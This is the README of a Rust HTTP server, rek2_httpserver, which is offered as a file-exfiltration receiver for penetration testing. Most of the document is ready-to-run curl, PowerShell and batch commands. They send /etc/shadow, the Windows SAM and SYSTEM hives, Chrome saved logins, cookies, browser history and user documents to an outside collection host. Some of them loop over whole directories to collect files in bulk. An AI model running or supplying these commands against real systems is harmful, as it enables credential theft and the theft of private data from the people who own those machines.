rek2_httpserver 0.1.1

HTTP server that accepts POST data to exfiltrate files from remote servers to local computer during hacking and penetration testing
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276

<!--
ReK2 2025
Hispagatos
gemini://rek2.hispagatos.org
https://rek2.hispagatos.org
-->

# rek2_httpserver

`rek2_httpserver` is a robust HTTP server written in Rust designed for reliable file exfiltration during penetration testing/Hacking. The server handles file uploads of any size and type while preserving filenames and data integrity.

## Features

- **Configurable Interface and Port**: Specify the network interface and port via command-line arguments
- **Organized File Storage**: Files are automatically organized by timestamp and client IP
- **Multiple Filename Sources**: Extracts filenames from URL path, X-Filename header, or Content-Disposition
- **Large File Support**: Configurable size limits (default 500MB) with streaming support
- **Path Preservation**: Maintains directory structure from uploaded files
- **Better Error Handling**: Graceful handling of edge cases and malformed requests
- **Detailed Logging**: Shows file sizes, client IPs, and full save paths
- **Usage Examples**: GET request to `/` shows curl examples

## Usage

### Command-Line Arguments

- `-i, --interface <INTERFACE>`: Sets the interface IP address. Default is `0.0.0.0` (all available interfaces)
- `-p, --port <PORT>`: Sets the port number. Default is `8081`
- `-o, --output <OUTPUT>`: Sets the output directory for uploads. Default is `./uploads`
- `-s, --max-size <MAX_SIZE>`: Maximum file size in MB. Default is `500`

### Running the Server

To start the server on a specific interface and port:

```bash
./rek2_httpserver -i 127.0.0.1 -p 8081
```

This will start the server on `http://127.0.0.1:8081`.

### Exfiltrating Files

The server now supports multiple methods for specifying filenames:

#### Method 1: Filename in URL Path (Recommended)

```bash
# Linux - preserves directory structure
curl -X POST --data-binary @/etc/passwd http://127.0.0.1:8081/upload/etc/passwd

# Windows
curl -X POST --data-binary "@C:\\Windows\\System32\\config\\SAM" http://127.0.0.1:8081/upload/Windows/System32/config/SAM
```

#### Method 2: X-Filename Header

```bash
# Linux
curl -X POST --data-binary @sensitive.db -H "X-Filename: database.db" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\\Users\\Admin\\secrets.txt" -H "X-Filename: admin_secrets.txt" http://127.0.0.1:8081/upload/
```

#### Method 3: Content-Disposition Header

```bash
# Linux
curl -X POST --data-binary @large_file.sql -H "Content-Disposition: attachment; filename=backup.sql" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\\Database\\prod.db" -H "Content-Disposition: attachment; filename=production.db" http://127.0.0.1:8081/upload/
```

#### Method 4: Auto-generated Filename

```bash
# When no filename is provided, generates timestamp-based name
curl -X POST --data-binary @confidential.zip http://127.0.0.1:8081/upload/
```

### File Organization

- Files are saved to: `uploads/YYYY-MM-DD_HH-MM-SS/client_ip/filename`
- The uploads directory is automatically created if it doesn't exist
- Directory structure from the client is preserved when possible
- Each upload session gets its own timestamp directory
- No file overwrites - each upload is uniquely stored

### Server Output

The server provides detailed logging:

```
Server running on http://0.0.0.0:8081
Output directory: ./uploads
Max file size: 500MB
[2024-01-15_14:30:45] 192.168.1.100 - 'etc/passwd' saved (2837 bytes) -> uploads/2024-01-15_14-30-45/192.168.1.100/etc/passwd
```

## Common Exfiltration Examples

### Linux Examples

#### Single File Upload

```bash
# Basic file upload (filename will be auto-generated)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/

# Upload with filename in URL (recommended - preserves path)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/etc/passwd

# Upload with custom filename
curl -X POST --data-binary @/etc/shadow -H "X-Filename: shadow_backup" http://target:8081/upload/

# Upload sensitive database
curl -X POST --data-binary @/var/lib/mysql/users.db http://target:8081/upload/mysql/users.db
```

#### Multiple Files

```bash
# Upload all config files from a directory
for file in /etc/*.conf; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/etc/$(basename "$file")
done

# Create a tar archive and upload
tar czf - /etc/apache2/ | curl -X POST --data-binary @- -H "X-Filename: apache_config.tar.gz" http://target:8081/upload/

# Upload all log files
find /var/log -name "*.log" -type f -exec curl -X POST --data-binary @{} http://target:8081/upload/{} \;
```

### Windows Examples

#### PowerShell

```powershell
# Basic file upload
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM"

# Upload with filename in URL
$file = "C:\Users\Admin\Documents\passwords.xlsx"
$filename = Split-Path $file -Leaf
Invoke-WebRequest -Uri "http://target:8081/upload/$filename" -Method POST -InFile $file

# Upload with custom headers
$headers = @{ "X-Filename" = "windows_sam_backup" }
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM" -Headers $headers

# Upload multiple files
Get-ChildItem -Path "C:\Users\*\Desktop\*.txt" -Recurse | ForEach-Object {
    $relativePath = $_.FullName.Replace("C:\", "").Replace("\", "/")
    Invoke-WebRequest -Uri "http://target:8081/upload/$relativePath" -Method POST -InFile $_.FullName
}
```

#### Command Prompt (curl)

```batch
:: Basic upload
curl -X POST --data-binary "@C:\Windows\System32\drivers\etc\hosts" http://target:8081/upload/

:: Upload with filename in URL
curl -X POST --data-binary "@C:\Users\Admin\AppData\Local\Chrome\User Data\Default\Login Data" http://target:8081/upload/chrome/login_data.db

:: Upload registry hive
curl -X POST --data-binary "@C:\Windows\System32\config\SYSTEM" -H "X-Filename: SYSTEM_HIVE" http://target:8081/upload/

:: Upload with Content-Disposition
curl -X POST --data-binary "@C:\ProgramData\TeamViewer\TeamViewer.ini" -H "Content-Disposition: attachment; filename=teamviewer_config.ini" http://target:8081/upload/
```

#### Batch Script for Multiple Files

```batch
@echo off
setlocal enabledelayedexpansion

set SERVER=http://target:8081/upload/

:: Upload all PDF files from Documents
for /r "C:\Users\%USERNAME%\Documents" %%f in (*.pdf) do (
    echo Uploading: %%f
    curl -X POST --data-binary "@%%f" %SERVER%documents/%%~nxf
)

:: Upload browser data
set BROWSERS=Chrome Firefox Edge
for %%b in (%BROWSERS%) do (
    if exist "C:\Users\%USERNAME%\AppData\Local\%%b" (
        echo Uploading %%b data...
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%b\User Data\Default\History" %SERVER%browser/%%b_history
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%b\User Data\Default\Cookies" %SERVER%browser/%%b_cookies
    )
)
```

### Special Cases

#### Large Files

```bash
# Linux - Split large files before upload
split -b 100M large_backup.sql part_
for file in part_*; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/backup/$file
done

# Windows PowerShell - Upload in chunks
$file = "C:\LargeDatabase.bak"
$chunkSize = 100MB
$stream = [System.IO.File]::OpenRead($file)
$buffer = New-Object byte[] $chunkSize
$chunkNum = 0

while (($bytesRead = $stream.Read($buffer, 0, $chunkSize)) -gt 0) {
    $tempFile = [System.IO.Path]::GetTempFileName()
    [System.IO.File]::WriteAllBytes($tempFile, $buffer[0..($bytesRead-1)])
    Invoke-WebRequest -Uri "http://target:8081/upload/database_chunk_$chunkNum" -Method POST -InFile $tempFile
    Remove-Item $tempFile
    $chunkNum++
}
$stream.Close()
```

#### Compressed Upload

```bash
# Linux - Compress before sending
gzip -c /var/log/syslog | curl -X POST --data-binary @- -H "X-Filename: syslog.gz" http://target:8081/upload/

# Windows - ZIP and upload
Compress-Archive -Path "C:\SensitiveData\*" -DestinationPath "$env:TEMP\data.zip"
Invoke-WebRequest -Uri "http://target:8081/upload/sensitive_data.zip" -Method POST -InFile "$env:TEMP\data.zip"
Remove-Item "$env:TEMP\data.zip"
```

## Building the Project

To build the project, use:

```bash
cargo build --release
```

This will create an executable in the \`target/release\` directory.

## Testing

The project includes comprehensive unit and integration tests:

```bash
# Run all tests
cargo test

# Run only unit tests
cargo test --lib

# Run only integration tests
cargo test --test upload_tests
```

**Test Coverage:**
- 17 unit tests covering filename extraction, header parsing, and edge cases
- 10 integration tests covering end-to-end upload functionality
- Tests for binary file integrity, unicode filenames, and error handling

For detailed testing information, see [TEST.md](TEST.md).

## License

This project is licensed under the GPLv3 License - see the [LICENSE](LICENSE) file for details.